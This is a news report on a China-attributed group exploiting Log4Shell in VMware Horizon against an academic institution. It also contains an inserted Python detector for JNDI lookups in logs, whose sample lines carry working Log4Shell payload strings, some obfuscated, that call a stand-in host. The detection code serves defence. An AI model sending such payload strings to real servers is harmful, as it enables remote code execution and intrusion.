A sophisticated cyber intrusion attributed to a China-based threat group, tracked as Aquatic Panda, has been detected exploiting a critical vulnerability in the Apache Log4j logging library. This attack vector enabled the adversaries to carry out post-exploitation activities, including reconnaissance and credential harvesting, against their target.
The cybersecurity firm CrowdStrike reported that this attempted breach, which has since been thwarted, specifically targeted a large, unnamed academic institution. Evidence suggests that Aquatic Panda has been operational since mid-2020, focusing on intelligence gathering and industrial espionage, predominantly against entities in telecommunications, technology, and governmental sectors.
The breach exploited the Log4Shell vulnerability (CVE-2021-44228, CVSS score: 10.0), allowing attackers to compromise a vulnerable instance of VMware Horizon, a desktop and application virtualization solution. Following this initial access, the attackers executed a series of malicious commands aimed at downloading payloads hosted on external servers.
According to researchers, a modified iteration of the Log4j exploit was likely employed during these activities, referencing an exploit made publicly available on GitHub shortly after its disclosure in December 2021. Aquatic Panda’s intrusive actions extended beyond simple reconnaissance. The group made efforts to disable third-party endpoint detection and response tools before attempting to deploy malware capable of establishing a reverse shell and harvesting user credentials.
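Detection logic for the kind of Log4Shell exploitation attempt described above, as an added example that is not part of the original report: it URL-decodes each request log line and collapses the nested-lookup obfuscation that public scanners were seen using before matching the JNDI lookup itself. The log lines and the host `attacker.example` are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample request log lines (not from the incident). The last three use
# nested lookups or URL encoding that a naive "${jndi:" string match would miss.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.7 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/a}"',
    '198.51.100.8 - - "GET /x HTTP/1.1" 404 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '198.51.100.9 - - "GET /x HTTP/1.1" 404 "${j${::-n}di:rmi://attacker.example/c}"',
    '203.0.113.6 - - "GET /%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 400 "-"',
]

# Lookups that evaluate to literal text: ${lower:x} / ${upper:x} -> x, ${::-x} -> x,
# ${env:NOSUCHVAR:-x} -> x (the ":-" default-value syntax).
_NESTED = re.compile(r"\$\{(?:(?:lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE)
# The JNDI lookup proper, with the URI schemes the JNDI lookup will dispatch on.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nis|nds|http)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups to their literal value."""
    text = unquote(unquote(text))
    prev = None
    while prev != text:  # innermost lookups resolve first; repeat until nothing changes
        prev = text
        text = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def find_jndi_attempts(lines):
    """Return (original_line, scheme) for every line that contains a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((line, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for line, scheme in find_jndi_attempts(SAMPLE_LOG_LINES):
        print(f"[{scheme}] {line}")
```

Run against real access or Horizon logs, the hits are the lines to correlate with outbound connections from the Java process to the host named in the lookup.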
The swift incident response by the targeted academic institution, which involved promptly activating their response protocols and ultimately patching the vulnerable application, was critical in thwarting further exploit attempts. However, the precise goals and intentions of Aquatic Panda remain unclear despite the disruption of their efforts.